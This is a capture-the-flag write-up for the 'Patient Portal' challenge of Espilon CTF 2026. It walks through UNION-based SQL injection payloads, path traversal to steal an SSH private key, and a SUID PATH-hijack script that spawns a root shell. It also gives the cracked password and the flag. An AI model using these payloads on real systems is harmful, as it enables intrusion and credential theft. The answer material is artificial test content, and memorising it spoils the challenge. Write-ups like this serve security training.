Eun0us/ESPILON-CTF-2026-Writeups
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
main
ESPILON-CTF-2026-Writeups/Misc/Patient_Portal
History
Eun0us 6a0877384d [+] Writeups v2 — sync solves, real points, scoreboard stats, cleanup 
- Remove undeployed challenges: Phantom_Byte, Cr4cK_w1f1, Lain_Br34kC0r3 V1,
  Lain_VS_Knights, Lets_All_Love_UART, AETHER_NET, Last_Train_451, Web3/
- Sync 24 solve/ files from main CTF-Espilon repo
- Update all READMEs with real CTFd final scores at freeze
- Add git-header.png banner
- Rewrite README: scoreboard top 10, edition stats (1410 users, 264 boards,
  1344 solves), correct freeze date March 26 2026
2026-03-27 21:27:45 +01:00
..
solve [+] Writeups v2 — sync solves, real points, scoreboard stats, cleanup 2026-03-27 21:27:45 +01:00
README.md [+] Writeups v2 — sync solves, real points, scoreboard stats, cleanup 2026-03-27 21:27:45 +01:00

README.md

Patient Portal

Field Value
Category Misc
Difficulty Medium-Hard
Points 340
Author Eun0us
CTF Espilon 2026

Description

The WIRED-MED network at Clinique Sainte-Mika runs a patient portal for staff. Intelligence suggests the system was hastily deployed by contractor M. Eiri.

Gain full control of the machine.

Ports:

  • 8080: Web Portal (HTTP)
  • 2222: SSH

Format: ESPILON{flag}

TL;DR

SQL injection on the /search endpoint to dump credentials and the SSH passphrase. Log in as admin, exploit path traversal on the report download endpoint to steal the SSH private key. SSH in as webadmin. Find a SUID binary that calls logger with a relative path. Hijack it via PATH injection to spawn a root shell and read the flag.

Tools

Tool Purpose
Browser / curl SQL injection, admin login, path traversal
hashcat / CrackStation MD5 crack for admin password
ssh Login as webadmin
bash PATH injection privilege escalation

Solution

Stage 1 — SQL Injection

The /search?q= endpoint is vulnerable to UNION-based injection with 6 columns.

Enumerate columns:

/search?q=' UNION SELECT 1,2,3,4,5,6--

Discover tables:

/search?q=' UNION SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'--

Tables: patients, users, system_config

Dump users:

/search?q=' UNION SELECT 1,username,password_hash,role,5,6 FROM users--

Results:

  • admin : MD5 hash e0b7e413c064de43c6c1ca40a8c175a1
  • nurse01 : (irrelevant)

Dump system_config:

/search?q=' UNION SELECT 1,key,value,3,4,5 FROM system_config--

Key finding: ssh_passphrase = wired-med-013

SQLi response showing the admin hash and ssh_passphrase rows

Crack the admin password:

echo -n "SainteMika2026" | md5sum
# e0b7e413c064de43c6c1ca40a8c175a1

Password: SainteMika2026

Stage 2 — Admin Access

Log in at /login:

  • Username: admin
  • Password: SainteMika2026

The admin panel reveals: SSH port 2222, user webadmin.

admin panel after login showing report links and system info

Stage 3 — Path Traversal

The /admin/reports?file= endpoint is vulnerable to path traversal.

Confirm user exists:

/admin/reports?file=../../../etc/passwd

Extract the SSH private key:

/admin/reports?file=../../../home/webadmin/.ssh/id_rsa

Save the key to id_rsa locally.

path traversal response returning the id_rsa private key

Stage 4 — SSH Access

chmod 600 id_rsa
ssh -i id_rsa -p 2222 webadmin@<HOST>
# Passphrase: wired-med-013  (from system_config)

Stage 5 — Privilege Escalation

Find SUID binaries:

find / -perm -4000 -type f 2>/dev/null

Found: /opt/navi-monitor/vital-check (SUID root)

Inspect the binary:

strings /opt/navi-monitor/vital-check | grep logger

The binary calls system("logger -t vital-check 'check complete'") using a relative path for logger.

strings output confirming the relative logger call

Exploit via PATH hijacking:

echo '#!/bin/bash' > /tmp/logger
echo '/bin/bash -p' >> /tmp/logger
chmod +x /tmp/logger
export PATH=/tmp:$PATH
/opt/navi-monitor/vital-check

bash -p preserves the SUID effective UID, spawning a root shell.

Read the flag:

cat /root/root.txt

root shell reading /root/root.txt with the flag

Flag

ESPILON{r00t_0f_s41nt3_m1k4}